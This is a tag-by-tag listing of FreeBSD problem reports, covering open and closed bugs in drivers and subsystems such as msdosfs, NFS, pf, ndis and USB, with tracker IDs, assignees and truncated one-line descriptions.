kern/80136 trasz [md] [reboot] mdconfig can reboot the system 6 problems total. Problem reports for tag 'mfi': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/124989 [mfi] mfi driver error - unexpected sense o kern/115133 scottl [mpt] [mfi] [patch] Patches to make mfi support LSI SA o kern/98091 scottl [mfi] [patch] Makefile style of mfi kernel module brok 3 problems total. Problem reports for tag 'mfs': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/52445 [mfs] panic when mounting floppy on MFS filesystem 1 problem total. Problem reports for tag 'minidump': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/118713 fs [minidump] [patch] Display media size required for a k 1 problem total. Problem reports for tag 'mk': S Tracker Resp. Description -------------------------------------------------------------------------------- o i386/113110 i386 [mk] [patch] i686 is not an alias of pentiumpro on GCC 1 problem total. Problem reports for tag 'mly': S Tracker Resp. Description -------------------------------------------------------------------------------- s kern/57398 scsi [mly] Current fails to install on mly(4) based RAID di o i386/55603 [mly] unable to reboot when system runs from Mylex A35 2 problems total. Problem reports for tag 'mmcsd': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/134745 [mmcsd] [panic] mmcsd.ko produce kernel panic 1 problem total. Problem reports for tag 'modules': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/135485 [modules] [patch] During a shutdown, kernel modules sh o amd64/131314 amd64 [modules] [panic] large modules fail to load on amd64 o kern/122782 amd64 [modules] accf_http.ko kernel module is not loadable a amd64/117186 amd64 [modules] kldload Unsupported file type on STABLE amd6 o kern/114291 kmacy [RFE] [modules] [patch] add dynamic module references o kern/96346 [modules] [patch] disable build of modules that are al o kern/88659 ipfw [modules] ipfw and ip6fw do not work properly as modul s kern/83738 jkoshy [modules] kldload hwpmc.ko fails with 'link_elf: symbo o usb/80829 usb [modules] [panic] possible panic when loading USB-modu a kern/74809 [modules] [panic] smbfs panic if multiply mounted o kern/70401 darrenr [modules] Could not load ipl.ko when no INET6 in the k o kern/68076 [modules] Page fault when the sequence "kldunload ucom o misc/60503 [modules] small error in modules installation f kern/48976 gavin [modules] nwfs.ko oddity 14 problems total. Problem reports for tag 'mount': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/39329 [mount] '..' at mountpoint is subject to the permissio 1 problem total. Problem reports for tag 'mouse': S Tracker Resp. Description -------------------------------------------------------------------------------- s usb/97286 usb [mouse] [request] MS Wireless Intellimouse Explorer 2. o usb/93408 usb [mouse] hw.acpi.cpu.cx_lowest=C3 on AMD Turion causes o kern/89258 [mouse] synaptic touchpad support "worse" with hw.psm. o kern/89166 [mouse] jumpy mouse movement o usb/87648 usb [mouse] Logitech USB-optical mouse problem. o usb/86298 usb [mouse] Known good USB mouse won't work with correct s 6 problems total. Problem reports for tag 'mpt': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/134488 scsi [mpt] MPT SCSI driver probes max. 8 LUNs per device o kern/133919 [mpt] [panic] 7.1 panics after completing rebuild of m o kern/132206 scsi [mpt] system panics on boot when mirroring and 2nd dri o kern/130621 scsi [mpt] tranfer rate is inscrutable slow when use lsi213 o kern/130330 scottl [mpt] [panic] Panic and reboot machine MPT driver when o kern/128514 fs [zfs] [mpt] problems with ZFS and LSILogic SAS/SATA Ad f kern/128282 gavin [mpt] system failure on removing two drives o kern/127109 [mpt]: FreeBSD fails to boot except in safe mode o kern/122321 [mpt] Hitachi SCSI drive can't be written to o kern/120247 scsi [mpt] FreeBSD 6.3 and LSI Logic 1030 = only 3.300MB/s o kern/117688 [mpt] mpt disk timeout and hang o kern/115606 [mpt] [panic] Panic while using mpt controller o kern/115133 scottl [mpt] [mfi] [patch] Patches to make mfi support LSI SA o kern/96040 [mpt] LSI1030 mpt0: bullet missed in timeout 14 problems total. Problem reports for tag 'msdosfs': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/133174 fs [msdosfs] [patch] msdosfs must support utf-encoded int o kern/132237 fs [msdosfs] msdosfs has problems to read MSDOS Floppy o kern/130920 fs [msdosfs] cp(1) takes 100% CPU time while copying file o kern/123939 fs [msdosfs] corrupts new files f usb/123508 vwe [umass] [msdosfs] damaged files (mp3,txt , etc) on fla o kern/120044 geom [msdosfs] [geom] incorrect MSDOSFS label fries adminis o bin/116980 fs [msdosfs] [patch] mount_msdosfs(8) resets some flags f p kern/116608 fs [msdosfs] [patch] msdosfs fails to check mount options o kern/111843 fs [msdosfs] Long Names of files are incorrectly created o kern/109024 fs [msdosfs] mount_msdosfs: msdosfs_iconv: Operation not o kern/109010 fs [msdosfs] can't mv directory within fat32 file system o kern/106632 trhodes [msdosfs] gimp destroys files on fat32 upon opening o kern/106255 trhodes [msdosfs] [patch]: correct setting of archive flag o kern/102250 trhodes [msdosfs] panic upon forced umount of removed medium o usb/96224 usb [usb] [msdosfs] mount_msdosfs cause page fault in sync o kern/93634 vwe [msdosfs] False access to renamed files/directories (c f kern/87368 bde [msdosfs] fat32 is very slow o kern/86587 fs [msdosfs] rm -r /PATH fails with lots of small files o kern/79441 trhodes [msdosfs] problem writing on mounted msdos-fs at /mnt p kern/70096 trhodes [msdosfs] [patch] full msdos file system causes corrup o kern/67326 rodrigc [msdosfs] crash after attempt to mount write protected o kern/62762 bde [msdosfs] Fsync for msdos fs does not sync entries o kern/45558 trhodes [msdosfs] mdconfig and msdosfs make fs writes hang a kern/21807 trhodes [msdosfs] [patch] Make System attribute correspond to o kern/15838 trhodes [msdosfs] [patch] Conversion tables in msdosfs_conv.c 25 problems total. Problem reports for tag 'msk': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/134401 net [msk] [panic] Kernel Fatal trap 12: page fault while i o kern/133204 net [msk] msk driver timeouts o kern/128884 net [msk] if_msk page fault while in kernel mode o kern/124127 net [msk] watchdog timeout (missed Tx interrupts) -- recov f kern/119613 yongari [msk] mskc0: Uncorrectable PCI Express error o kern/116853 yongari [msk] msk watchdog timeout f kern/114631 yongari [msk] "Tx descriptor error" with Marvell Yukon 7 problems total. Problem reports for tag 'mtx': S Tracker Resp. Description -------------------------------------------------------------------------------- f kern/135692 [mtx] [witness] blockable sleep lock - kernel panic on 1 problem total. Problem reports for tag 'multicast': S Tracker Resp. Description -------------------------------------------------------------------------------- f kern/122839 net [multicast] FreeBSD 7 multicast routing problem 1 problem total. Problem reports for tag 'mutex': S Tracker Resp. Description -------------------------------------------------------------------------------- f kern/131573 [mutex] lock_init() assumes zero-filled struct 1 problem total. Problem reports for tag 'mxge': S Tracker Resp. Description -------------------------------------------------------------------------------- o amd64/130483 amd64 [mxge] MSI must be disabled when Myricom 10Gbps Card i 1 problem total. Problem reports for tag 'myk': S Tracker Resp. Description -------------------------------------------------------------------------------- f kern/130329 gavin [myk] panic 1 problem total. Problem reports for tag 'nanobsd': S Tracker Resp. Description -------------------------------------------------------------------------------- o misc/135588 embedded [nanobsd] simple patch for adding amd64 support p misc/127759 edwin [nanobsd] [patch] nanobsd.sh incorrectly calculates pa o misc/123240 [nanobsd] [patch] rerunning nanobsd.inc.sh fails becau p kern/101228 edwin [nanobsd] [patch] Two more entries for FlashDevice.sub o conf/96746 [nanobsd] [patch] Configuration changes and README for o misc/93341 phk [nanobsd] [patch] make more flexibitily for NanoBSD cu 6 problems total. Problem reports for tag 'nat': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/132354 net [nat] Getting some packages to ipnat(8) causes crash o kern/121534 darrenr [ipl] [nat] FreeBSD Release 6.3 Kernel Trap 12: 2 problems total. Problem reports for tag 'ncurses': S Tracker Resp. Description -------------------------------------------------------------------------------- o bin/119903 [ncurses] Fast increase in loading of the processor. A o bin/107171 [patch] [ncurses] systat(1) doesn't die when it's xter o conf/71254 [ncurses] xterm vs. cons* termtypes or sc(4) 3 problems total. Problem reports for tag 'ndis': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/132889 net [ndis] [panic] NDIS kernel crash on load BCM4321 AGN d o kern/132672 net [ndis] [panic] ndis with rt2860.sys causes kernel pani o kern/131781 net [ndis] ndis keeps dropping the link f kern/130820 net [ndis] wpa_supplicant(8) returns 'no space on device' o kern/130525 net [ndis] [panic] 64 bit ar5008 ndisgen-erated driver cau o kern/129580 net [ndis] Netgear WG311v3 (ndis) causes kenel trap at boo p kern/127644 weongyo [ndis] [panic] NDIS panic p kern/125181 thompsa [ndis] [patch] with wep enters kdb.enter.unknown, pani o kern/124225 cokane [ndis] [patch] ndis network driver sometimes loses net o kern/118493 weongyo [ndis] [patch] a trivial fix when ndis sets `ndis_reso p kern/118439 thompsa [ndis] [patch] if_ndis - fix a panic when ndis_attach( p kern/118370 thompsa [ndis] [patch] if_ndis - fix a scanning problem of Mar o kern/116747 net [ndis] FreeBSD 7.0-CURRENT crash with Dell TrueMobile o docs/114184 doc [patch] [ndis]: add info to man 4 ndis o kern/109406 thompsa [ndis] Broadcom WLAN driver 4.100.15.5 doesn't work wi o kern/91859 net [ndis] if_ndis does not work with Asus WL-138 f kern/89738 [ndis] [hang] Can't make WL8000PCM wifi card work with s kern/86920 net [ndis] ifconfig: SIOCS80211: Invalid argument [regress 18 problems total. Problem reports for tag 'net': S Tracker Resp. Description -------------------------------------------------------------------------------- a kern/116697 kmacy [net] [patch] ifconfig's name argument has no effect o f kern/110720 kmacy [net] [patch] [request] support for interface descript o kern/106722 glebius [net] [patch] ifconfig may not connect an interface to o kern/90973 thompsa [net] [patch] if_bridge does not handle arp for own ad o kern/83622 brooks [net] [patch] add network interfaces labeling support s kern/81147 net [net] [patch] em0 reinitialization while adding aliase s kern/12071 fanf [net] [patch] new function: large scale IP aliasing 7 problems total. Problem reports for tag 'netatalk': S Tracker Resp. Description -------------------------------------------------------------------------------- s kern/4184 rwatson [netatalk] [patch] minor nits in sys/netatalk 1 problem total. Problem reports for tag 'netgraph': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/134557 net [netgraph] [hang] 7.2 with mpd5.3 hanging up - ng_pptp o kern/132984 net [netgraph] swi1: net 100% cpu usage o kern/122290 net [netgraph] [panic] Netgraph related "kmem_map too smal o kern/120304 net [netgraph] [patch] netgraph source assumes 32-bit time o kern/118727 net [netgraph] [patch] [request] add new ng_pf module o kern/115019 net [netgraph] ng_ether upper hook packet flow stops on ad o kern/106444 [netgraph] Kernel Panic on Binding to an ip to a virtu o kern/104751 net [netgraph] kernel panic, when getting info about my tr o kern/102540 [netgraph] [patch] supporting vlan(4) by ng_fec(4) o conf/102502 net [netgraph] [patch] ifconfig name does't rename netgrap o kern/97306 net [netgraph] NG_L2TP locks after connection with failed o kern/87421 [netgraph] [panic]: ng_ether + ng_eiface + if_bridge o kern/82881 [netgraph] [panic] ng_fec(4) causes kernel panic after o sparc/80410 sparc64 [netgraph] netgraph is causing crash with mpd on sparc o kern/66225 [netgraph] [patch] extend ng_eiface(4) control message o kern/63863 glebius [netgraph] [patch] [request] implement NGM_ELECTROCUTE 16 problems total. Problem reports for tag 'netinet': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/133786 [netinet] [patch] ip_input might cause kernel panic o kern/133235 net [netinet] [patch] Process SIOCDLIFADDR command incorre o kern/132832 net [netinet] [patch] tcp_output() might generate invalid o kern/131536 net [netinet] [patch] kernel does allow manipulation of su o kern/125845 net [netinet] [patch] tcp_lro_rx() should make use of hard o kern/121706 net [netinet] [patch] "rtfree: 0xc4383870 has 1 refs" emit o kern/95277 net [netinet] [patch] IP Encapsulation mask_match() return o kern/75122 silby [netinet] [patch] Incorrect inflight bandwidth calcula a kern/61744 andre [netinet] [patch] TCP hangs onto mbufs with no tcp dat 9 problems total. Problem reports for tag 'netisr': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/100519 net [netisr] suggestion to fix suboptimal network polling 1 problem total. Problem reports for tag 'newfs': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/77181 mckusick [newfs] [patch] newfs -g largevalue, mkdir, panic 1 problem total. Problem reports for tag 'newusb': S Tracker Resp. Description -------------------------------------------------------------------------------- o usb/133989 usb [newusb] [ukbd] USB keyboard dead at mountroot> prompt o usb/130122 usb [newusb] DVD drive detects as 'da' device o docs/129962 usb [newusb] usbconfig(8) refers to non-existant usb2_core 3 problems total. Problem reports for tag 'nfe': S Tracker Resp. Description -------------------------------------------------------------------------------- f kern/127910 vwe [nfe] FBSD-7.0 amd64 nfe ethernet not completely worki o kern/123429 net [nfe] [hang] "ifconfig nfe up" causes a hard system lo o i386/121549 i386 [nfe]: nfe interface locks up during rc.conf initializ o kern/120232 net [nfe] [patch] Bring in nfe(4) to RELENG_6 o amd64/115126 yongari [nfe] nfe0: watchdog timeout (missed Tx interrupts) -- o i386/106789 i386 [nfe] or [nve]: Internal NIC of GA-K8N51GMF-RH does no 6 problems total. Problem reports for tag 'nfs': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/135412 fs [zfs] [nfs] zfs(v13)+nfs and open(..., O_WRONLY|O_CREA o kern/135237 [nfs] sendfile(2) and SF_NODISKIO blocks on NFS files o kern/132934 [nfs] Cancel of a NFS-lock fails repeatedly o kern/131995 fs [nfs] Failure to mount NFSv4 server o kern/131360 fs [nfs] poor scaling behavior of the NFS server under lo o kern/131342 fs [nfs] mounting/unmounting of disks causes NFS to fail o kern/130628 net [nfs] NFS / rpc.lockd deadlock on 7.1-R o kern/129760 fs [nfs] after 'umount -f' of a stale NFS share FreeBSD l f kern/129719 net [nfs] [panic] Panic during shutdown, tcp_ctloutput: in o kern/129132 [nfs] 7.1-Beta2 nfsd cannot lock o kern/128448 net [nfs] 6.4-RC1 Boot Fails if NFS Hostname cannot be res o kern/125149 fs [nfs] [panic] changing into .zfs dir from nfs client c o kern/124280 [nfs] [panic] FreeBSD 7/amd64 STABLE crash o kern/123755 dfr [nfs] fstat(1) fails to return ESTALE with rename()d f o kern/121566 rc [nfs] [request] [patch] ethernet iface should be broug o kern/119791 net [nfs] UDP NFS mount of aliased IP addresses from a Sol o kern/119617 net [nfs] nfs error on wpa network when reseting/shutdown o bin/118318 mohans [nfs] NFS server hangs under special circumstances o kern/118126 kmacy [nfs] Poor NFS server write performance o kern/114506 [nfs] nfs_readdirrpc doesn't use copyout to write out o kern/114451 [nfs] [patch] prevent NFS server possible crash o kern/114111 [nfs] System crashes while writing on NFS-mounted shar o kern/112528 net [nfs] NFS over TCP under load hangs with "impossible p o kern/111848 [nfs] removing a file from a diskless nfs mounted root o kern/111162 [nfs] nfs_getpages does not restart interrupted system o kern/106646 [nfs] [patch] Pointer incorrectly cast to ulong o kern/105241 [nfs] problem with Linux NFS server up/down combined w o kern/97329 [nfs] [patch] code simplification o kern/94830 [nfs] [patch] mount_nfs causes a fatal trap 18 if the o kern/94256 dfr [nfs] nfs locking/rpc.lockd doesn't understand file de o kern/86944 [nfs] [patch] When I use FreeBSD with NFS client, clos s kern/86319 [nfs] [request] support a "noac" NFS mount flag to tur o kern/85894 [nfs] [panic] nfs_timer / nfs_socket.c:1146 panic o kern/84968 [nfs] programs on nfs4 mounts won't execute o kern/84965 [nfs] nfs4 mount generates NFS4ERR_BAD_SEQID o kern/84964 [nfs] nfs4 mount doesn't handle NFS4ERR_GRACE o kern/84953 kuriyama [nfs] NFS locking issue in RELENG_6/i386/SMP o kern/82805 [nfs] [panic] sched_switch ched_4bsd.c:865 / nfs_inact o kern/81770 [nfs] Always "NFS append race" at every NFS mount with o kern/79336 [nfs] NFS client doesn't detect file updates on Novell s kern/78884 [nfs] [patch] nfs client cache negative lookups o kern/78673 [nfs] [patch] nfs client open resets attrstamp ever if o kern/77902 [nfs] NFS client should use VA_UTIMES_NULL to determin o kern/76126 [nfs] [patch] 4.11 client will send a NFS request to r o kern/71391 [nfs] [panic] md via NFS file + mount -t ntfs: panic: o kern/70708 [nfs] gcore/procfs not finding /proc/pid/file on repea s kern/67545 [nfs] NFS Diskless Mount Option Suggestion a kern/64816 [nfs] [patch] mmap and/or ftruncate does not work corr a kern/62278 [nfs] [patch] NFS server may not set eof flag when rea a kern/57696 [nfs] NFS client readdir terminates prematurely if ren o kern/54383 net [nfs] [patch] NFS root configurations without dynamic o kern/48894 [nfs] Suggested improvements to the NFS read-ahead heu o kern/44580 [nfs] NFS updates file access time when file is modifi o kern/41216 [nfs] Get "NFS append race" error o kern/35669 [nfs] NFSROOT breaks without a gateway o kern/33203 [nfs] "got bad cookie" errors on NFS client o kern/31380 [nfs] NFS rootfs mount failure message too cryptic o kern/27232 [nfs] On NFSv3 mounted filesystems, stat returns st_bl f kern/26142 vwe [nfs] Unlink fails on NFS mounted filesystem o conf/22308 [nfs] mounting NFS during boot blocks if host map come o kern/22291 [nfs] getcwd(3) fails on recently-modified NFS-mounted s conf/17540 [nfs] NIS host lookups cause NFS mounts to wedge at bo s kern/17108 [nfs] SecureRPC not supported in mount_nfs command 63 problems total. Problem reports for tag 'ng_mppc': S Tracker Resp. Description -------------------------------------------------------------------------------- f kern/123045 gonzo [ng_mppc] ng_mppc_decompress - disabling node 1 problem total. Problem reports for tag 'ng_nat': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/125704 [ng_nat] kernel libalias: repeatable panic 1 problem total. Problem reports for tag 'nis': S Tracker Resp. Description -------------------------------------------------------------------------------- o bin/129541 [nis] passwd(1) cannot be forced to "yp" mode in some p conf/117555 dougb [patch] [nis] NIS-dependent services cannot start if y o kern/88320 [nis] ypxfr(8) talks IPv6 to IPv4-only portmap -> ypin o conf/72592 [nis] NIS Domain Master fails as client of itself o bin/71625 [patch] [nis] cleanup of the usr.sbin/rpc.ypupdated co o bin/71617 [patch] [nis] ypserv(8): cleanup of the usr.sbin/ypser o bin/71616 [patch] [nis] yp_mkdb(8): cleanup of the usr.sbin/yp_m o bin/67142 [nis] rpc.yppasswdd incorrectly throws errors about in o bin/66893 [patch] [nis] rpc.yppasswdd(8): Linux NIS clients conn o bin/66830 [nis] chsh(1) ypchsh(1) do not change user information o bin/54097 [nis] Non-local yppasswd(1) -d broken in 5.1-CURRENT o bin/52343 [nis] login(1) problem on the server o bin/51628 [nis] ypmatch doesn't match keys in legacy NIS servers o kern/44578 [nis] getnetgrent fails to read NIS netgroup map o bin/42093 [nis] ypbind(8) hangs on NIC with the lowest scopeid o bin/40215 [nis] NIS host search not terminate o kern/34842 [nis] [patch] VmWare port + NIS causes "broadcast stor o bin/29903 [nis] ypbind(8) loses connection to NIS master and nev o bin/29808 [nis] ypserv(8) dumps core in yp_find_db o bin/24461 [nis] Being able to increase the YP timeout without re s bin/2090 [patch] [nis] clients may bind to FreeBSD ypserv refus 21 problems total. Problem reports for tag 'notes': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/133162 [NOTES] [patch] document modular ata driver devices 1 problem total. Problem reports for tag 'nsswitch.conf': S Tracker Resp. Description -------------------------------------------------------------------------------- o conf/123330 net [nsswitch.conf] Enabling samba wins in nsswitch.conf c o conf/73337 [nsswitch.conf] [patch] potential invalid free o conf/64788 [nsswitch.conf] nsswitch with ldap and starting ppp on 3 problems total. Problem reports for tag 'ntfs': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/120483 fs [ntfs] [patch] NTFS filesystem locking changes o kern/120482 fs [ntfs] [patch] Sync style changes between NetBSD and F o kern/118107 fs [ntfs] [panic] Kernel panic when accessing a file at N o kern/117314 fs [ntfs] Long-filename only NTFS fs'es cause kernel pani o kern/116515 remko [ntfs] NTFS mount does not check that user has permiss o kern/114847 fs [ntfs] [patch] [request] dirmask support for NTFS ala o kern/103035 fs [ntfs] Directories in NTFS mounted disc images appear o kern/99290 fs [ntfs] mount_ntfs ignorant of cluster sizes o kern/97377 fs [ntfs] [patch] syntax cleanup for ntfs_ihash.c p kern/89966 rodrigc [ntfs] [panic] mounting ntfs causes kernel panic in so o kern/73484 fs [ntfs] Kernel panic when doing `ls` from the client si o kern/71774 fs [ntfs] NTFS cannot "see" files on a WinXP filesystem 12 problems total. Problem reports for tag 'nullfs': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/130210 fs [nullfs] Error by check nullfs o bin/121898 fs [nullfs] pwd(1)/getcwd(2) fails with Permission denied o sparc/104428 sparc64 [nullfs] nullfs panics on E4500 (but not E420) o kern/51583 fs [nullfs] [patch] allow to work with devices and socket 4 problems total. Problem reports for tag 'nve': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/118990 [nve] nve + PAE bus_addr_t/void * inconsistencies s amd64/108861 amd64 [nve] nve(4) driver on FreeBSD 6.2 AMD64 does not work o i386/106789 i386 [nfe] or [nve]: Internal NIC of GA-K8N51GMF-RH does no o kern/106243 net [nve] double fault panic in if_nve.c on high loads o kern/88045 jhb [nve] [patch] 6.0rc1: nve0: device timeout (51) o amd64/84027 obrien [nve] if_nve gets stuck 6 problems total. Problem reports for tag 'nwfs': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/65920 fs [nwfs] Mounted Netware filesystem behaves strange 1 problem total. Problem reports for tag 'ofw': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/112477 marius [ofw] [patch] Add support to set the node and type on 1 problem total. Problem reports for tag 'ohci': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/127222 usb [ohci]: Regression in 7.0 usb storage generic driver o usb/122539 usb [ohci] [panic] AnyDATA ADU-E1000D - kernel panic: ohci o usb/121755 usb [ohci] [patch] Fix panic after ohci/uhub cardbus devic o usb/108056 usb [ohci] Mouse gets powered off during device probe when o usb/107827 usb [ohci] [panic] ohci_add_done addr not found o usb/101448 usb [ohci] FBSD 6.1-STABLE/AMD64 crashes under heavy USB/O o usb/93828 usb [ohci] [panic] ohci causes panic on boot (HP Pavillion o usb/79269 usb [ohci] USB ohci da0 plug/unplug causes crashes and loc 8 problems total. Problem reports for tag 'padlock': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/135014 [padlock] Using padlock(4) in 8-current triggers "fpud 1 problem total. Problem reports for tag 'pae': S Tracker Resp. Description -------------------------------------------------------------------------------- o i386/129550 i386 [pae] [kqueue] crash with PAE kernel 1 problem total. Problem reports for tag 'pam': S Tracker Resp. Description -------------------------------------------------------------------------------- o bin/113230 des [pam] [patch] const-ify PAM-headers o kern/107154 [pam] pam.d/sshd pam_ssh.so doesn't start ssh-agent o kern/94978 [pam] pam_opie module option without "no_fake_prompts" o kern/88150 des [pam] PAM does not search /usr/local/lib for modules o kern/83099 des [pam] pam_login_access change causes cyrus-sasl-saslau s bin/25477 [pam] [patch] pam_radius(8) fix to allow null password 6 problems total. Problem reports for tag 'patm': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/112686 net [patm] patm driver freezes System (FreeBSD 6.2-p4) i38 1 problem total. Problem reports for tag 'pccard': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/121760 [pccard] [cardbus] an ed1 network pccard's CIS wasn't p kern/60307 [pccard] [patch] wrong product id in pccarddevs for Sp o i386/41364 imp [pccard] NewMedia "Bus Toaster" SCSI card w/ Advansys 3 problems total. Problem reports for tag 'pccbb': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/128870 [pccbb] Interrupt Storm when plugging in PCMCIA Card ( o kern/128608 [pccbb] [patch] add support for powering down and up C o kern/128040 [pccbb] [patch] System hangs when PCMCIA-CF adapter pl o kern/128037 [pccbb] [patch] System hang on shutdown with PCMCIA-CF f kern/111990 [pccbb] [patch] system freeze in initialization proces 5 problems total. Problem reports for tag 'pci': S Tracker Resp. Description -------------------------------------------------------------------------------- s kern/133733 [pci] [patch] Incorrect record in pci_vendors for Broa o kern/130957 jhb [pci] /sys/dev/pci/pci.c revision 181771 breaks networ o kern/129713 [pci] pci-pci bridge quirk with ich7 chipset not handl o i386/100142 i386 [pci] [patch] /dev/smb0 device not available on system o kern/95661 [pci] [patch] pci_pci still not correct for initializi o kern/91347 rodrigc [pci] [patch] Add another PCI-e chipset for extended c o kern/89837 [pci] PCI code outputs superfluous "failed to enable/d p kern/79139 rodrigc [pci] [patch] Support for more PCIe chipsets o kern/70810 [pci] [patch] Enable SMBus device on Asus P4B series m o kern/65355 [pci] [patch] TC1000 serial ports need enabling o kern/59903 [pci] [patch] "pci_find_device" returns [only/at] the 11 problems total. Problem reports for tag 'pcm': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/129604 multimedia [pcm]: Sound stops with error: pcm0:virtual:dsp0.vp0: 1 problem total. Problem reports for tag 'pcmcia': S Tracker Resp. Description -------------------------------------------------------------------------------- f amd64/123275 amd64 [cbb] [pcmcia] cbb/pcmcia drivers on amd64 failure [re o kern/117026 imp [pcmcia]: Panic while removing PCMCIA wireless card o kern/94898 [pcmcia] GPRS PCMCIA card cause interrupt storm and co 3 problems total. Problem reports for tag 'pcvt': S Tracker Resp. Description -------------------------------------------------------------------------------- o i386/75887 i386 [pcvt] with vt0.disabled=0 and PCVT in kernel video/ke o stand/54839 standards [pcvt] pcvt deficits o stand/54833 standards [pcvt] more pcvt deficits a kern/26348 [pcvt] scon -s, page fault in HP mode 4 problems total. Problem reports for tag 'pecoff': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/80742 wkoszek [pecoff] [patch] Local DoS in sys/compat/pecoff (+ oth o kern/60963 [pecoff] [patch] Win32 Applications abort on PECOFF 2 problems total. Problem reports for tag 'periodic': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/135502 net [periodic] Warning message raised by rtfree function i o conf/123551 [patch] [periodic] /etc/periodic/daily/440.status-mail o conf/123516 [periodic] Daily Security Logs Not Reporting Failed Lo p conf/122811 brian [periodic] [patch] the daily_clean_disks scripts walks o conf/70715 [periodic] Lack of year in dates in auth.log can cause o conf/47596 [periodic] daily security run complains if timezone ch 6 problems total. Problem reports for tag 'pf': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/134996 pf [pf] Anchor tables not included when pfctl(8) is run w o kern/133732 pf [pf] max-src-conn issue o kern/132769 pf [pf] [lor] 2 LOR's with pf task mtx / ifnet and rtent f kern/132176 pf [pf] pf stalls connection when using route-to [regress o conf/130381 pf [rc.d] [pf] [ip6] ipv6 not fully configured when pf st o kern/129861 pf [pf] [patch] Argument names reversed in pf_table.c:_co o kern/127920 pf [pf] ipv6 and synproxy don't play well together o conf/127814 pf [pf] The flush in pf_reload in /etc/rc.d/pf does not w o kern/127439 pf [pf] deadlock in pf f kern/127345 pf [pf] Problem with PF on FreeBSD7.0 [regression] o kern/127121 pf [pf] [patch] pf incorrect log priority o kern/127042 pf [pf] [patch] pf recursion panic if interface group is o kern/125467 pf [pf] pf keep state bug while handling sessions between s kern/124933 pf [pf] [ip6] pf does not support (drops) IPv6 fragmented o kern/124364 pf [pf] [panic] Kernel panic with pf + bridge o kern/122773 pf [pf] pf doesn't log uid or pid when configured to o kern/122014 pf [pf] [panic] FreeBSD 6.2 panic in pf o kern/121704 pf [pf] PF mangles loopback packets o kern/120281 pf [pf] [request] lost returning packets to PF for a rdr o kern/120057 pf [pf] [patch] Allow proper settings of ALTQ_HFSC. The c o bin/118355 pf [pf] [patch] pfctl(8) help message options order false o kern/114567 pf [pf] [lor] pf_ioctl.c + if.c o kern/111220 pf [pf] repeatable hangs while manipulating pf tables s conf/110838 pf [pf] tagged parameter on nat not working on FreeBSD 5. o kern/93825 pf [pf] pf reply-to doesn't work o sparc/93530 pf [pf] Incorrect checksums when using pf's route-to on s o kern/92949 pf [pf] PF + ALTQ problems with latency o kern/82271 pf [pf] cbq scheduler cause bad latency 28 problems total. Problem reports for tag 'pfsync': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/135162 pf [pfsync] pfsync(4) not usable with GENERIC kernel o kern/133060 net [ipsec] [pfsync] [panic] Kernel panic with ipsec + pfs o kern/101794 [pfsync] Setting plip as syncdev for pfsync causes ker 3 problems total. Problem reports for tag 'picobsd': S Tracker Resp. Description -------------------------------------------------------------------------------- o misc/116453 [picobsd] picobsd build script fails for not exist log o misc/52256 embedded [picobsd] picobsd build script does not read in user/s o kern/42728 embedded [picobsd] many problems in src/usr.sbin/ppp/* after c o misc/42115 luigi [picobsd] [patch] fix build script for 4.6-STABLE o bin/42084 luigi [picobsd] PicoBSD's 'netstat -i' reports negative Ipkt p misc/15876 edwin [picobsd] PicoBSD message of the day problems 6 problems total. Problem reports for tag 'pipe': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/93685 [pipe] select on pipe write fails from '0' end o kern/77493 [pipe] freebsd 5.3 + bash process substitution fails d 2 problems total. Problem reports for tag 'plip': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/113856 [patch] [plip] PLIP (parallel port IP) dead on 6.2, de o kern/102035 net [plip] plip networking disables parallel port printing 2 problems total. Problem reports for tag 'portalfs': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/9679 [portalfs] [patch] fix for uninterruptible open in por 1 problem total. Problem reports for tag 'powerd': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/117242 [powerd] [hang] console hangs when powerd is adaptive o i386/106850 i386 [powerd] powernow0 attach returned 6 o amd64/87689 amd64 [powerd] [hang] powerd hangs SMP Opteron 244 5-STABLE 3 problems total. Problem reports for tag 'ppbus': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/17425 [ppbus] [patch] fix two small printing errors in ppbus 1 problem total. Problem reports for tag 'ppp': S Tracker Resp. Description -------------------------------------------------------------------------------- o kern/133572 net [ppp] [hang] incoming PPTP connection hangs the system o kern/129219 net [ppp] Kernel panic when using kernel mode ppp o kern/123890 net [ppp] [panic] crash & reboot on work with PPP low-spee o conf/119550 [ppp] ppp not starting during bootup. o usb/118353 usb [panic] [ppp] repeatable kernel panic during ppp(4) se o bin/114081 bz [patch] [ppp] ppp(8) should be able to set ethernet ad o conf/106009 rc [ppp] [patch] [request] Fix pppoed startup script to p o conf/105689 rc [ppp] [request] syslogd starts too late at boot o conf/105145 rc [ppp] [patch] [request] add redial function to rc.d/pp 